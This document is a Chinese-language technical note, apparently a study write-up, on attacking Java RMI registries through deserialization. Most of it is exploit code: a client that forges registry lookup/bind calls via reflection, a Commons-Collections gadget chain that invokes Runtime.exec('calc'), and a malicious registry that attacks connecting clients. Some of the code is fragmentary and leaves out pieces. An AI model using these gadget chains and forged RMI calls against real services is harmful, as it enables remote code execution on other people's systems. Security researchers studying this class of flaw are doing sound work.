handleMessages serviceCall UnicastServerRef#dispatch oldDispatch RegistryImpl_Skel#dispatch //客户端/服务端攻击注册中心 case 0: // bind(String, Remote) case 1: // list() case 2: // lookup(String) in.readObject(); // 对lookup的参数进行反序列化。客户端攻击服务端 case 3: // rebind(String, Remote) case 4: // unbind(String)
代码
public class RegistryExploit { public static void main(String[] args) throws Exception{ RegistryImpl_Stub registry = (RegistryImpl_Stub) LocateRegistry.getRegistry("127.0.0.1", 1099);
lookup(registry); // bind(registry); }
public static void lookup(RegistryImpl_Stub registry) throws Exception {
Class RemoteObjectClass = registry.getClass().getSuperclass().getSuperclass(); Field refField = RemoteObjectClass.getDeclaredField("ref"); refField.setAccessible(true); UnicastRef ref = (UnicastRef) refField.get(registry);
Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};
public static void bind(RegistryImpl_Stub registry) throws Exception {
Class RemoteObjectClass = registry.getClass().getSuperclass().getSuperclass(); Field refField = RemoteObjectClass.getDeclaredField("ref"); refField.setAccessible(true); UnicastRef ref = (UnicastRef) refField.get(registry);
Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};
public static HashMap genEvilMap() throws Exception{
Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) };
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");
HashMap<Object, Object> map2 = new HashMap<>(); map2.put(tiedMapEntry, "bbb"); lazyMap.remove("aaa");
Class c = LazyMap.class; Field factoryField = c.getDeclaredField("factory"); factoryField.setAccessible(true); factoryField.set(lazyMap,chainedTransformer);
直接运行会报错:Caused by: java.rmi.UnmarshalException: unrecognized method hash: method not supported by remote object at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:294)。
public class EvilRegistry { public static void main(String[] args) throws Exception { new RemoteObjImpl(); Remote remoteObj = new RemoteWrapper(); Registry r = LocateRegistry.createRegistry(1099); r.bind("remoteObj",remoteObj); } }
class RemoteWrapper implements Remote, Serializable { private Map map;
UnicastRef#invoke StreamRemoteCall#executeCall DataInputStream rd = new DataInputStream(conn.getInputStream()); case TransportConstants.ExceptionalReturn:in.readObject();